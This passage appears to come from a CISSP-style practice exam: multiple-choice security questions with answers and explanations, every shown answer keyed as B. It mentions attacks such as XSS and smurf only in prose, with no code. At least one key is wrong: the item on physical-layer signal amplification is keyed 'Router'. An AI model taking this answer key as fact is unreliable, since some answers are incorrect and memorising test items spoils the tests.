B. Information that is required to always be available should be mirrored or duplexed. In both mirroring (also known as RAID 1) and duplexing, every data write operation occurs simultaneously or nearly simultaneously in more than one physical place. The distinction between mirroring and duplexing is that with mirroring the two (or more) physical places where the data is written may be attached to the same controller, leaving the storage still subject to the single point of failure of the controller itself; in duplexing, two or more controllers are used.

What is the purpose of polyinstantiation? A. To restrict lower-level subjects from accessing low-level information B. To make a copy of an object and modify the attributes of the second copy C. To create different objects that will react in different ways to the same input D. To create different objects that will take on inheritance attributes from their class

B. Instantiation is what happens when an object is created from a class. Polyinstantiation is when more than one object is made and the other copy is modified to have different attributes. This can be done for several reasons. The example given in the chapter was a way to use polyinstantiation for security purposes to ensure that a lower-level subject could not access an object at a higher level.

A Class C handheld fire extinguisher would be preferable to a Class A handheld fire extinguisher when the fire: A. Has just started B. Involves electrical equipment. C. Is located in an enclosed area D. Is caused by flammable liquids.

B. Involves electrical equipment.

If an access control has a fail-safe characteristic but not a fail-secure characteristic, what does that mean? A. It defaults to no access. B. It defaults to being unlocked. C. It defaults to being locked. D. It defaults to sounding a remote alarm instead of a local alarm.

B. It defaults to being unlocked.

How is virtual storage created? A. It is a combination of primary and secondary storage. B. It is a combination of RAM and secondary storage C. It is a combination of real storage and secondary storage. D. It is a combination of RAM and EPROM memory.

B. It is a combination of RAM and secondary storage

In order to be admissible in court, evidence should normally be which of the following? A. Subpoenaed B. Relevant C. Motioned D. Adjudicated

B. It is important that evidence be relevant, complete, sufficient, and reliable to the case at hand. These four characteristics of evidence provide a foundation for a case and help ensure that the evidence is legally permissible.

Your office is implementing an access control policy based on decentralized administration, which is controlled directly by the owners and creators of files. What is the major advantage and disadvantage of such an approach? A. It puts access control into the hands of those most accountable for the information, but requires security labels for enforcement. B. It puts access control into the hands of those most accountable for the information, but leads to inconsistencies in procedures and criteria. C. It puts access control into the hands of IT administrators, but leads to procedures and criteria that are too rigid and inflexible. D. It puts access control into the hands of IT administrators, but forces them to overly rely upon file owners to implement the access controls IT puts in place.

B. It puts access control into the hands of those most accountable for the information, but leads to inconsistencies in procedures and criteria.

Which of the following needs to be met so that evidence is legally admissible in court? A. Modified computer files B. Lawful search and seizure C. Forced confession D. Entrapment evidence

B. Lawful search and seizure

Hiring new employees requires strict security controls that must be constantly reviewed and audited. Which of the following controls would not be associated with personnel hiring? A. Background checks. B. Least Privilege C. Drug screen. D. NDA

B. Least Privilege

What feature enables code to be executed without the usual security checks? A. Temporal isolation B. Maintenance hook C. Race conditions D. Process multiplexing

B. Maintenance hook

Failure of a contingency plan is usually due to: A. Technical issues. B. Management issues. C. Lack of awareness D. Lack of training.

B. Management issues.

Which of the following statements is true regarding a BCP project plan? A. Management must have a representative on the BCP team B. Management must approve the plan in writing. C. To ensure diversity, the people who write the plan should not be those who carry it out. D. The plan should be tested before presenting it to management.

B. Management must approve the plan in writing.

Greg is the security facility officer of a financial institution. His boss told him that visitors need a secondary screening before they are allowed into sensitive areas within the building. Greg has also been told by the network administrators that after the new HVAC system was installed throughout the facility, they have noticed that power voltage to the system in the data center sags. Which of the following is the best control that Greg should ensure is implemented to deal with his boss's concern? A. Access and audit logs. B. Mantrap C. Proximity Readers. D. Smart card readers.

B. Mantrap

Mary is creating malicious code that will steal a user's cookies by modifying the original client-side JavaScript. What type of cross-site scripting vulnerability is she exploiting? A. Second order B. DOM-based C. Persistent D. Nonpersistent

B. Mary is exploiting a document object model (DOM)-based cross-site scripting (XSS) vulnerability, which is also referred to as local cross-site scripting. DOM is the standard structure layout to represent HTML and XML documents in the browser. In such attacks the document components such as form fields and cookies can be referenced through JavaScript. The attacker uses the DOM environment to modify the original client-side JavaScript. This causes the victim's browser to execute the resulting abusive JavaScript code. The most effective way to prevent these attacks is to disable scripting support in the browser.

Operating systems have evolved and changed over the years. The earlier operating systems were monolithic and did not segregate critical processes from noncritical processes. As time went on, operating system vendors started to reduce the amount of programming code that ran in kernel mode. Only the absolutely necessary code ran in kernel mode, and the remaining operating system code ran in user mode. This architecture introduced performance issues, which required the operating system vendors to reduce the critical operating system functionality to microkernels and allow the remaining operating system functionality to run in a client/server model within kernel mode. Which of the following best describes the second operating system architecture described in the scenario? A. Layered. B. Microkernel C. Monolithic. D. Kernel-Based.

B. Microkernel

Which is not a drawback to installing intrusion detection and monitoring systems? A. It's expensive to install. B. It cannot be penetrated. C. It requires human response. D. It's subject to false alarms.

B. Monitoring and intrusion detection systems are expensive, require someone to respond when they set off an alarm, and, because of their level of sensitivity, can cause several false alarms. Like any other type of technology or device, they have their own vulnerabilities that can be exploited and penetrated.

Part of operational recovery is designing backup facility configurations to work in an acceptable manner so that business can continue. Which of the following is a setup that allows services to be distributed over two or more in-house centers? A. Hot site. B. Multi-Processing center. C. Mobile site. D. Reciprocal Agreements.

B. Multi-Processing center.

A small-town security office has recently installed a new computer system for their staff of five. The system contains many levels of classified information and is set up to allow each of the employees different access permissions. Which type of system does this scenario describe? A. Dedicated mode system. B. Multilevel security system. C. Hardware segmentation. D. Layering system.

B. Multilevel security system.

Ensuring data consistency is important for all the following reasons, except A. Replicated data sets can become desynchronized. B. Multiple data items are commonly needed to perform a transaction. C. Data may exist in multiple locations within our information systems. D. Multiple users could attempt to modify data simultaneously.

B. Multiple data items are commonly needed to perform a transaction.

OCTAVE, NIST SP 800-30, and AS/NZS ISO 31000 are different approaches to carrying out risk management within companies and organizations. What are the differences between these methods? A. NIST SP 800-30 and OCTAVE are corporate based, while AS/NZS is international. B. NIST SP 800-30 is IT based, while OCTAVE and AS/NZS ISO 31000 are corporate based. C. AS/NZS is IT based, and OCTAVE and NIST SP 800-30 are assurance based. D. NIST SP 800-30 and AS/NZS are corporate based, while OCTAVE is international.

B. NIST SP 800-30 is IT based, while OCTAVE and AS/NZS ISO 31000 are corporate based.

Which of the following is an advantage of having an audit performed by an external, third party? A. Third-party audits are cheaper to conduct than internal ones, as they tend to be less extensive. B. Third-party audit teams are likely to have a breadth of experience beyond what internal teams may possess, due to having inspected a wider array of systems, controls, and enterprises. C. Third-party audit teams are likely to better understand the systems and controls they are inspecting than the internal teams responsible for architecting, deploying, and maintaining them. D. Due to their experience having audited a broad array of enterprises, a third-party assessor is likely to better and more objectively understand the internal dynamics and politics of the target organization.

B. One of the great strengths of an external auditor is expected to be the experience of assessing a broader array of systems and controls than are deployed and maintained within any single enterprise. This should bring with it a better understanding of the broader context within which these controls operate, as well as some perspective as to issues the target enterprise is not aware of or hasn't fully considered.

Database software should meet the requirements of what is known as the ACID test. Why should database software carry out atomic transactions, which is one requirement of the ACID test, when OLTP is used? A. So that the rules for database integrity can be established B. So that the database performs transactions as a single unit without interruption C. To ensure that rollbacks cannot take place D. To prevent concurrent processes from interacting with each other

B. Online transaction processing (OLTP) is used when databases are clustered to provide high fault tolerance and performance. It provides mechanisms to watch for and deal with problems when they occur. For example, if a process stops functioning, the monitor mechanisms within OLTP can detect this and attempt to restart the process. If the process cannot be restarted, then the transaction taking place will be rolled back to ensure no data is corrupted or that only part of a transaction happens. OLTP records transactions as they occur (in real time), which usually updates more than one database in a distributed environment. This type of complexity can introduce many integrity threats, so the database software should implement the characteristics of what's known as the ACID test:
Atomicity: Divides transactions into units of work and ensures that all modifications take effect or none takes effect. Either the changes are committed or the database is rolled back.
Consistency: A transaction must follow the integrity policy developed for that particular database and ensure all data is consistent in the different databases.
Isolation: Transactions execute in isolation until completed, without interacting with other transactions. The results of the modification are not available until the transaction is completed.
Durability: Once the transaction is verified as accurate on all systems, it is committed, and the databases cannot be rolled back.
The term "atomic" means that the units of a transaction will occur together or not at all, thereby ensuring that if one operation fails, the others will not be carried out and corrupt the data in the database.

Who has the primary responsibility of determining the classification level for information? A. Senior management B. Owner C. User D. Functional manager.

B. Owner

What is the primary purpose of using one-way hashing on user passwords? A. It minimizes the amount of primary and secondary storage needed to store passwords. B. It prevents anyone from reading passwords in plaintext. C. It avoids excessive processing required by an asymmetric algorithm. D. It prevents replay attacks.

B. Passwords are usually run through a one-way hashing algorithm so the actual password is not transmitted across the network or stored on a system in plaintext. This greatly reduces the risk of an attacker being able to obtain the actual password.

Alice needs to hire a third party to conduct a test of her company's security posture. If she needs to determine whether and how an attacker could truly penetrate her company's defenses, which of the following services should she select? A. Vulnerability assessment. B. Penetration test. C. Regulatory audit. D. DSS audit.

B. Penetration test.

The new reinforced lock and cage serve as which of the following? A. Logical controls B. Physical controls C. Administrative controls D. Compensating controls

B. Physical controls

What is the relationship between policies and standards? A. Policies detail who should do the work, and standards detail why. B. Policies detail what should be done, and the standards detail how. C. Policies describe the security vision, and standards detail what should be done. D. Policies embody general principles, and standards describe who does the work.

B. Policies detail what should be done, and the standards detail how.

Protection methods can be integrated into software programs. What type of protection method is illustrated in the graphic that follows? A. Polymorphism B. Polyinstantiation C. Cohesiveness D. Object classes

B. Polyinstantiation is the simultaneous existence of multiple information objects, which refer to the same real-world concept but differ by their classification level and/or their contents. The multiple instances are commonly distinguished by their security levels. Polyinstantiation is when more than one copy of an object is made, and the other copy is modified to have different attributes. This can be done for several reasons. A way to use polyinstantiation is for security purposes, to ensure that a lower-level subject could not access an object at a higher level. If a lower-level subject does not have the clearance of Top Secret, then it should not be able to access data at this classification level.

Which of the following can be described as the process of creating two versions of an object so that users at a lower level of security cannot access information at a higher level of sensitivity? A. polymorphism. B. polyinstantiation C. inference. D. aggregation.

B. Polyinstantiation.

Which of the following lists of terms is usually associated with nongovernmental organizations? A. for official use only, secret, and proprietary. B. Private, proprietary, and sensitive C. unclassified, secret, and top secret. D. sensitive but unclassified, proprietary, and trade secret.

B. Private, proprietary, and sensitive.

Personal Health Information (PHI) would generally be categorized as which of the following? A. Top secret. B. Private. C. Secret D. Public

B. Private.

Sam is a software developer and has recently gone through secure software development courses. When reviewing his programming code, he sees that his software splits authentication and authorization steps. Why would this be a concern? A. A buffer overflow can cause authorization before identification steps. B. Processing sequencing can be manipulated. C. HTTP splitting can take place. D. Browser injection can take place.

B. Processing sequencing can be manipulated.

There are several different important pieces to the Common Criteria. Which of the following best describes the first of the missing components? A. Target of evaluation B. Protection Profile C. Security Target. D. EALs

B. Protection Profile

Which of the following accurately describes Identity as a Service (IDaaS)? A. A form of single sign-on (SSO) that spans multiple entities in an enterprise B. A form of SSO that spans multiple independent enterprises C. A way to provide SSO without multiple forms of authentication D. A way to demonstrate identity without having to sign on

B. Providers of IDaaS allow their clients to have a form of SSO that works across various otherwise independent accounts for independent vendors. A common example is the ability to use a Google account to create a Facebook page.

John is responsible for deciding on the correct RAID level that is implemented to the company's new RAID system. Which of the following would he choose if the number one priority is performance instead of redundancy? A. RAID 1 B. RAID 0 C. RAID 4 D. RAID 5

B. RAID 0

Various levels of RAID dictate the type of activity that will take place within the RAID system. Which level is associated with byte-level parity? A. RAID level 0 B. RAID level 3 C. RAID level 5 D. RAID level 10

B. Redundant array of inexpensive disks (RAID) provides fault tolerance for hard drives and can improve system performance. Redundancy and speed are provided by breaking up the data and writing it across several disks so that different disk heads can work simultaneously to retrieve the requested information. Recovery data is also created—this is called parity—so that if one disk fails, the parity data can be used to reconstruct the corrupted or lost information. Different activities that provide fault tolerance or performance improvements occur at different levels of a RAID system. RAID level 3 is a scheme employing byte-level striping and a dedicated parity disk. Data is striped over all but the last drive, with parity data held on only the last drive. If a drive fails, it can be reconstructed from the parity drive. The most common RAID level used today is level 5.

System ports allow different computers to communicate with each other's services and protocols. The Internet Corporation for Assigned Names and Numbers has assigned registered ports to be ______________ and dynamic ports to be _____________. A. 0-1024, 49152-65535 B. 1024-49151, 49152-65535 C. 1024-49152, 49153-65535 D. 0-1024, 1025-49151

B. Registered ports are 1024-49151, which can be registered with the Internet Corporation for Assigned Names and Numbers (ICANN) for a particular use. Vendors register specific ports to map to their proprietary software. Dynamic ports are 49152-65535 and are available to be used by any application on an "as needed" basis.

Which is the best description of remote journaling? A. Backing up bulk data to an offsite facility B. Backing up transaction logs to an offsite facility C. Capturing and saving transactions to two mirrored servers in-house D. Capturing and saving transactions to different media types

B. Remote journaling is a technology used to transmit data to an offsite facility, but this usually only includes moving the journal or transaction logs to the offsite facility, not the actual files.

What device works at the physical layer to amplify electrical signals between network segments? A. Switch B. Router C. Repeater D. Gateway.

B. Router

What would be a common access control technique used in firewalls and routers for processing packets? A. role-based access control B. Rule-based Access control C. Time-based access control D. Context access control rules

B. Rule-based Access control

Security Assertion Markup Language (SAML) is an XML-based standard for exchanging authentication and authorization data between systems on different security domains. SAML allows for the sharing of authentication information, such as how authentication took place, entity attributes, and what the entity is authorized to access. SAML is most commonly used in web-based environments that require single sign-on (SSO) capability. Which of the following has a correct definition associated with the corresponding SAML component? A. Two SAML assertions are used (authentication, authorization) that indicate that an SAML authority validated a specific subject. B. SAML assertions are most commonly used to allow for identity federation and distributed authorization. C. SAML binding specification describes how to embed SAML messages within the TCP and UDP protocols. D. SAML profiles define how SAML messages, assertions, and protocols are to be implemented in SSL and TLS.

B. SAML provides a model to allow two parties to share authentication information about one entity. The two parties are considered the service provider and the identity provider. The identity provider asserts information about the principal, such as whether or not the subject has been authenticated or has a particular attribute. The service provider uses the information supplied by the identity provider to make access decisions, including but not limited to, whether or not to trust the identity provider's assertion. By trusting the identity provider's information, the service provider can provide services without requiring the principal to authenticate again. This framework allows for federated identification and distributed authentication across domains.

____ is the name of a policy agreement established between the United States Department of Commerce and the European Union (E.U.) in November 2000 to regulate the way that U.S. companies export and handle the personal data (such as names and addresses) of European citizens. A. Trans-border flow B. Safe harbor C. European Union D. Organization for Economic Co-operation and Development.

B. Safe harbor

If an external router filters traffic before it enters the network and another screening device monitors traffic before it enters the internal network, what type of architecture is this? A. Screened host. B. Screened subnet. C. Dual-homed firewall D. Dual subnets.

B. Screened subnet.

Alice wants to send a message to Bob, who is several network hops away from her. What is the best approach to protecting the confidentiality of the message? A. PPTP B. S/MIME C. Link encryption D. SSH

B. Secure Multipurpose Internet Mail Extensions (S/MIME) is a standard for encrypting and digitally signing e-mail and for providing secure data transmissions using public key infrastructure (PKI).

Use the following scenario to answer Questions 13-15. Jack has just been hired as the security officer for a large hospital. The organization develops some of its own proprietary applications. The organization does not have as many layers of controls when it comes to the data processed by these applications, since it is assumed that external entities will not understand the internal logic of the applications. One of the first things that Jack wants to carry out is a risk assessment to determine the organization's current risk profile. He also tells his boss that the hospital should become ISO certified to bolster its customers' and partners' confidence. Which of the following approaches has been implemented in this scenario? A. Defense-in-depth B. Security through obscurity C. Information security management system D. BS 17799

B. Security through obscurity is depending upon complexity or secrecy as a protection method. Some organizations feel that since their proprietary code is not standards based, outsiders will not know how to compromise its components. This is an insecure approach. Defense-in-depth is a better approach with the assumption that anyone can figure out how something works.

What is the difference between security training and a security awareness program? A. Security awareness involves an enterprise program that targets employees with specific duties regarding information security. B. Security training provides specific role-based instruction for employees with information security responsibilities. C. Security awareness provides specific, role-based instruction for employees with information security responsibilities. D. Security training is necessary for all employees regardless of the role they play with respect to information security.

B. Security training provides specific role-based instruction for employees with information security responsibilities.

Which of the following technologies should Lance's team investigate for increased authentication efforts? A. Challenge Handshake Authentication Protocol B. Simple Authentication and Security Layer C. IEEE 802.2AB D. EAP-SSL

B. Simple Authentication and Security Layer is a protocol-independent authentication framework. This means that any protocol that knows how to interact with SASL can use its various authentication mechanisms without having to actually embed the authentication mechanisms within its code.

Which of the following statements is true with respect to the physical security of distribution and storage facilities? A. Smaller intermediate distribution facilities (IDFs) and storage facilities tend not to contain data as critical as the data in main distribution facilities (MDFs) and data centers, so they require less physical protection. B. Although smaller IDFs and storage facilities contain data as critical as the data in MDFs and data centers, they are commonly less well protected physically. C. All distribution and storage facilities are typically afforded the same level of physical protection in practice. D. Distribution and storage facilities don't require the same level of physical access controls as the production data centers.

B. Smaller IDFs and storage facilities contain data as critical as the data in MDFs and data centers but are commonly less well protected physically. For example, an IDF may be not much more than a switch on a shelf in a janitor's closet that is commonly left unlocked. Likewise, storage facilities for archived data are unlikely to have the same physical access controls as a data center.

Use the following scenario to answer Questions 24-26. Sandy has just started as the manager of software development at a new company. As she interviews her new team members, she is finding out a few things that may need to be approached differently. Programmers currently develop software code and upload it to a centralized server for backup purposes. The server software does not have versioning control capability, so sometimes the end software product contains outdated code elements. She has also discovered that many in-house business software packages follow the Common Object Request Broker Architecture, which does not necessarily allow for easy reuse of distributed web services available throughout the network. One of the team members has combined several open API functionalities within a business-oriented software package. Which of the following is the best technology for Sandy's team to implement as it pertains to the previous scenario? A. Computer-aided software engineering tools B. Software configuration management C. Software development life-cycle management D. Software engineering best practices

B. Software configuration management (SCM) identifies the attributes of software at various points in time, and performs a methodical control of changes for the purpose of maintaining software integrity and traceability throughout the software development life cycle. It defines the need to track changes and provides the ability to verify that the final delivered software has all of the approved changes that are supposed to be included in the release.

According to the separation of duties principle, which of the following is true? A. programmers should only test their own code. B. Someone other than programmers should test their code. C. The test code should go directly to production. D. Programmers should interact with code in production.

B. Someone other than programmers should test their code.

Use the following scenario to answer Questions 30-32. Sean is the new security administrator for a large financial institution. There are several issues that Sean is made aware of the first week he is in his new position. First, spurious packets seem to arrive at critical servers even though each network has tightly configured firewalls at each gateway position to control traffic to and from these servers. One of Sean's team members complains that the current firewall logs are excessively large and full of useless data. He also tells Sean that the team needs to be using fewer permissive rules instead of the current "any-any" rule type in place. Sean has also found out that some team members want to implement tarpits on some of the most commonly attacked systems. Which of the following is most likely taking place to allow spurious packets to gain unauthorized access to critical servers? A. TCP sequence hijacking is taking place. B. Source routing is not restricted. C. Fragment attacks are underway. D. Attacker is tunneling communication through PPP.

B. Source routing means the packet decides how to get to its destination, not the routers in between the source and destination computer. Source routing moves a packet throughout a network on a predetermined path. To make sure none of this misrouting happens, many firewalls are configured to check for source routing information within the packet and deny it if it is present.

Jack needs to assess the performance of a critical web application that his company recently upgraded. Some of the new features are very profitable, but not frequently used. He wants to ensure that the user experience is positive, but doesn't want to wait for the users to report problems. Which of the following techniques should Jack use? A. Real user monitoring B. Synthetic transactions C. Log reviews D. Management review

B. Synthetic transactions are scripted events that mimic the behaviors of real users and allow security professionals to systematically test the performance of critical services. They are the best approach, because they can detect problems before users notice them. Real user monitoring would rely on users encountering the problem, whereupon the system would automatically report it.

What term is used to describe the construction of a transaction used to systematically test the behavior or performance of a critical service which would normally involve human interaction? A. Real user monitoring. B. Synthetic transactions. C. Gray box testing. D. Natural transactions.

B. Synthetic transactions.

Which of the following is one of the easiest and best solutions Tanya can consider for proper data protection? A. Implementation of mandatory access control B. Implementation of access control lists C. Implementation of digital signatures D. Implementation of multilevel security

B. Systems that provide mandatory access control (MAC) and multilevel security are very specialized, require extensive administration, are expensive, and reduce user functionality. Implementing these types of systems is not the easiest approach out of the list. Since there is no budget for a PKI, digital signatures cannot be used because they require a PKI. In most environments access control lists (ACLs) are in place and can be modified to provide tighter access control. ACLs are bound to objects and outline what operations specific subjects can carry out on them.

Which of the following is a true statement pertaining to TACACS, XTACACS, and TACACS+? A. TACACS separates authentication and authorization. B. TACACS+ allows for two-factor authentication and dynamic passwords. C. XTACACS combines authentication, authorization, and auditing. D. TACACS+ combines authentication, authorization, and auditing.

B. TACACS+ allows for two-factor authentication and dynamic passwords.

Advanced Encryption Standard is an algorithm used for which of the following? A. Data integrity B. Bulk data encryption C. Key recovery D. Distribution of symmetric keys

B. The Advanced Encryption Standard (AES) is a data encryption standard that was developed to improve upon the previous de facto standard—the Data Encryption Standard (DES). As a symmetric algorithm, AES is used to encrypt bulk data. Symmetric algorithms of any kind are used to encrypt large amounts of data (bulk), while asymmetric algorithms are used to encrypt a small amount of data as in keys and hashing values.

Mark has been asked to interview individuals to fulfill a new position in his company, chief privacy officer (CPO). What is the function of this type of position? A. Ensuring that company financial information is correct and secure B. Ensuring that customer, company, and employee data is protected C. Ensuring that security policies are defined and enforced D. Ensuring that partner information is kept safe

B. The CPO is a newer position, created mainly because of the increasing demands on organizations to protect a long laundry list of different types of data. This role is responsible for ensuring that customer, company, and employee data is secure and kept secret, which keeps the company out of criminal and civil courts and hopefully out of the headlines.

Jenny needs to engage a new software development company to create her company's internal banking software. It will need to be created specifically for her company's environment, so it must be proprietary in nature. Which of the following would be useful for Jenny to use as a gauge to determine how advanced the various software development companies are in their processes? A. Waterfall methodology B. Capability Maturity Model Integration level C. Auditing results D. Key performance metrics

B. The Capability Maturity Model Integration (CMMI) model outlines the necessary characteristics of an organization's security engineering process. It addresses the different phases of a secure software development life cycle, including concept definition, requirements analysis, design, development, integration, installation, operations, and maintenance, and what should happen in each phase. It can be used to evaluate security engineering practices and identify ways to improve them. It can also be used by customers in the evaluation process of a software vendor. In the best of both worlds, software vendors would use the model to help improve their processes and customers would use the model to assess the vendor's practices.

Which best describes the IP protocol? A. A connectionless protocol that deals with dialog establishment, maintenance, and destruction B. A connectionless protocol that deals with the addressing and routing of packets C. A connection-oriented protocol that deals with the addressing and routing of packets D. A connection-oriented protocol that deals with sequencing, error detection, and flow control

B. The IP protocol is connectionless and works at the network layer. It adds source and destination addresses to a packet as it goes through its data encapsulation process. IP can also make routing decisions based on the destination address.

Which of the following best describes the difference between the role of the ISO/IEC 27000 series and COBIT? A. COBIT provides a high-level overview of security program requirements, while the ISO/IEC 27000 series provides the objectives of the individual security controls. B. The ISO/IEC 27000 series provides a high-level overview of security program requirements, while COBIT provides the objectives of the individual security controls. C. COBIT is process oriented, and the ISO/IEC 27000 series is solution oriented. D. The ISO/IEC 27000 series is process oriented, and COBIT is solution oriented.

B. The ISO/IEC 27000 series provides a high-level overview of security program requirements, while COBIT provides the objectives of the individual security controls. COBIT provides the objectives that the real-world implementations (controls) you choose to put into place need to meet.

The Mobile IP protocol allows location-independent routing of IP datagrams on the Internet. Each mobile node is identified by its ___________, disregarding its current location in the Internet. While away from its home network, a mobile node is associated with a ____________. A. prime address, care-of address B. home address, care-of address C. home address, secondary address D. prime address, secondary address

B. The Mobile IP protocol allows location-independent routing of IP packets on web-based environments. Each mobile device is identified by its home address. While away from its home network, a mobile node is associated with a care-of address, which identifies its current location, and its home address is associated with the local endpoint of a tunnel to its home agent. Mobile IP specifies how a mobile device registers with its home agent and how the home agent routes packets to the mobile device.

Which of the following is not very useful in assessing the security of acquired software? A. The reliability and maturity of the vendor B. The NIST's National Software Reference Library C. Third-party vulnerability assessments D. In-house code reviews

B. The National Software Reference Library (NSRL) is the only term that was not addressed in this chapter. It comprises a collection of digital signatures of known, traceable software applications intended to assist in the investigation of crimes involving computers. The other three answers are all part of a rigorous assessment of the security of acquired software.

Which of the following is based on the fact that it is hard to factor large numbers into two original prime numbers? A. ECC B. RSA C. DES D. Diffie-Hellman

B. The RSA algorithm's security is based on the difficulty of factoring large numbers into their original prime numbers. This is a one-way function. It is easier to calculate the product than it is to identify the prime numbers used to generate that product.

The recovery time objective (RTO) and maximum tolerable downtime (MTD) metrics have similar roles, but their values are very different. Which of the following best describes the difference between RTO and MTD metrics? A. The RTO is a time period that represents the inability to recover, and the MTD represents an allowable amount of downtime. B. The RTO is an allowable amount of downtime, and the MTD represents a time period after which severe and perhaps irreparable damage is likely. C. The RTO is a metric used in disruptions, and the MTD is a metric used in disasters. D. The RTO is a metric pertaining to loss of access to data, and the MTD is a metric pertaining to loss of access to hardware and processing capabilities.

B. The RTO value is smaller than the MTD value, because the MTD value represents the time after which an inability to recover significant operations will mean severe and perhaps irreparable damage to the organization's reputation or bottom line. The RTO assumes that there is a period of acceptable downtime. This means that a company can be out of production for a certain period of time (RTO) and still get back on its feet. But if the company cannot get production up and running within the MTD window, the company is sinking too fast to properly recover.

What type of security encryption component is missing from the table that follows?

                 802.1X Dynamic WEP   Wi-Fi Protected Access         Robust Security Network
Access Control   802.1X               802.1X or preshared key        802.1X or preshared key
Authentication   EAP methods          EAP methods or preshared key   EAP methods or preshared key
Encryption       WEP                  (blank)                        CCMP (AES Counter Mode)
Integrity        None                 Michael MIC                    CCMP (AES CBC-MAC)

A. Service Set ID B. Temporal Key Integrity Protocol C. Ad hoc WLAN D. Open system authentication

B. The Temporal Key Integrity Protocol (TKIP) generates random values used in the encryption process, which makes it much harder for an attacker to break. To allow for an even higher level of encryption protection, the standard also includes the new Advanced Encryption Standard (AES) algorithm to be used in new WLAN implementations. TKIP actually works with the Wired Equivalent Privacy (WEP) protocol by feeding it keying material, which is data to be used for generating new dynamic keys. WEP uses the RC4 encryption algorithm, and the current implementation of the algorithm provides very little protection. More complexity is added to the key generation process with the use of TKIP, which makes it much more difficult for attackers to uncover the encryption keys. The IEEE working group developed TKIP so that customers would only need to obtain firmware or software updates instead of purchasing new equipment for this type of protection.

Which of the following statements is NOT true about the IPv4 address 192.168.10.129/25? A. It is an RFC 1918-specified private address. B. The netmask for this address is 255.255.255.0. C. The network address for the network it specifies is 192.168.10.128/25. D. The host portion of this 32-bit address is the low-order 7 bits.

B. The /25 classless interdomain routing (CIDR) notation for this address indicates that the high-order (leftmost) 25 bits comprise the network portion, and the remaining low-order (rightmost) 7 bits are the host portion. In binary, the netmask representation would look like: 11111111 11111111 11111111 10000000. The "dotted quad" decimal notation of this netmask would then be 255.255.255.128.

Which of the following is the best and most cost-effective countermeasure for Grace's team to put into place? A. Network address translation B. Disallowing unnecessary ICMP traffic coming from untrusted networks C. Application-based proxy firewall D. Screened subnet using two firewalls from two different vendors

B. The attack description is a smurf attack. In this situation the attacker sends an ICMP Echo Request packet with a spoofed source address to a victim's network broadcast address. This means that each system on the victim's subnet receives an ICMP Echo Request packet. Each system then replies to that request with an ICMP Echo Response packet to the spoofed address provided in the packets—which is the victim's address. All of these response packets go to the victim system and overwhelm it because it is being bombarded with packets it does not necessarily know how to process. Filtering out unnecessary ICMP traffic is the cheapest solution.

Which of the following would not be an issue that Jim would have to consider in transitioning administrative services to the cloud? A. Privacy and data breach laws in the country where the cloud servers are located B. Loss of efficiencies, performance, reliability, scalability, and security C. Security provisions in the terms of service D. Total cost of ownership compared to the current systems

B. The biggest advantages of cloud computing are enhanced efficiency, performance, reliability, scalability, and security. Still, cloud computing is not a panacea. We must still carefully consider legal, contractual, and cost issues since they could potentially place an organization in a difficult position.

One of the characteristics of object-oriented programming is deferred commitment. Which of the following is the best description for this characteristic? A. The building blocks of software are autonomous objects, cooperating through the exchange of messages. B. The internal components of an object can be redefined without changing other parts of the system. C. Classes are reused by other programs, though they may be refined through inheritance. D. Object-oriented analysis, design, and modeling map to business needs and solutions.

B. The characteristics and their associated definitions are listed as follows:
Modularity: Autonomous objects, cooperation through exchanges of messages.
Deferred commitment: The internal components of an object can be redefined without changing other parts of the system.
Reusability: Refining classes through inheritance. Other programs using the same objects.
Naturalness: Object-oriented analysis, design, and modeling map to business needs and solutions.

Not every data transmission incorporates the session layer. Which of the following best describes the functionality of the session layer? A. End-to-end data transmission B. Application client/server communication mechanism in a distributed environment C. Application-to-computer physical communication D. Provides application with the proper syntax for transmission

B. The communication between two pieces of the same software product that reside on different computers needs to be controlled, which is why session layer protocols even exist. Session layer protocols take on the functionality of middleware, enabling software on two different computers to communicate.

Which of the following is not a form of social engineering? A. Pretexting B. Fishing C. Whaling D. Blackmailing

B. The correct term for social engineering conducted over digital communications means is phishing, not fishing.

Companies should follow certain steps in selecting and implementing a new computer product. Which of the following sequences is ordered correctly? A. Evaluation, accreditation, certification B. Evaluation, certification, accreditation C. Certification, evaluation, accreditation D. Certification, accreditation, evaluation

B. The first step is evaluation. Evaluation involves reviewing the product's protection functionality and assurance ratings. The next phase is certification. Certification involves testing the newly purchased product within the company's environment. The final stage is accreditation, which is management's formal approval.

The software development life cycle has several phases. Which of the following lists these phases in the correct order? A. Requirements gathering, design, development, maintenance, testing, release B. Requirements gathering, design, development, testing, operations and maintenance C. Prototyping, build and fix, increment, test, maintenance D. Prototyping, testing, requirements gathering, integration, testing

B. The following outlines the common phases of the software development life cycle:
i. Requirements gathering
ii. Design
iii. Development
iv. Testing
v. Operations and maintenance

Which of the following is not one of the stages of the DHCP lease process? i. Discover ii. Offer iii. Request iv. Acknowledgment A. All of them B. None of them C. i, ii D. ii, iii

B. The four-step DHCP lease process is:
DHCPDISCOVER message: This message is used to request an IP address lease from a DHCP server.
DHCPOFFER message: This message is a response to a DHCPDISCOVER message, and is sent by one or numerous DHCP servers.
DHCPREQUEST message: The client sends this message to the initial DHCP server that responded to its request.
DHCPACK message: This message is sent by the DHCP server to the DHCP client and is the process whereby the DHCP server assigns the IP address lease to the DHCP client.

Which of the following types of tests involves discursive explorations of existing response procedures, based on a likely adverse scenario, designed to determine if desired outcomes will result? A. Structured walk-through test B. Tabletop exercise C. Simulation test D. Checklist test

B. The goal of tabletop exercises (TTXs) is to examine existing controls and response procedures to the manifestation of a likely threat, to ensure that everyone who would be involved knows their role and that the resulting outcome across multiple contingencies would be what is desired. Branches in activities are typically explored to some degree, based on cascading dependencies, as well as sequels to the scenario under discussion.

Why is it important to understand the life cycle of cryptography and your cryptographic needs? A. Major new forms of cryptography are constantly being invented, which may replace your use of hashing, symmetric, or asymmetric encryption methods. B. The available key space for any given algorithm (or your choice of keys within it) will inevitably "go stale" over time. C. Symmetric systems like AES are continuously being upgraded to include more rounds of transforms, so it is important to be using the latest version. D. Revolutionary advances in blockchains will replace old cryptography techniques.

B. The historically consistent rate of advance in commercial, off-the-shelf computational power has meant that the work factor of all of our cryptographic key spaces has declined over time. This should be assumed to continue: systems that cannot be easily brute forced today may be easily brute forced tomorrow.

An organization's information system risk management (ISRM) policy should address many items to provide clear direction and structure. Which of the following is not a core item that should be covered in this type of policy?
i. The objectives of the IRM team
ii. The level of risk the organization will accept and what is considered an acceptable level of risk
iii. Formal processes of risk identification
iv. The connection between the IRM policy and the organization's strategic planning processes
v. Responsibilities that fall under IRM and the roles to fulfill them
vi. The mapping of risk to specific physical controls
vii. The approach toward changing staff behaviors and resource allocation in response to risk analysis
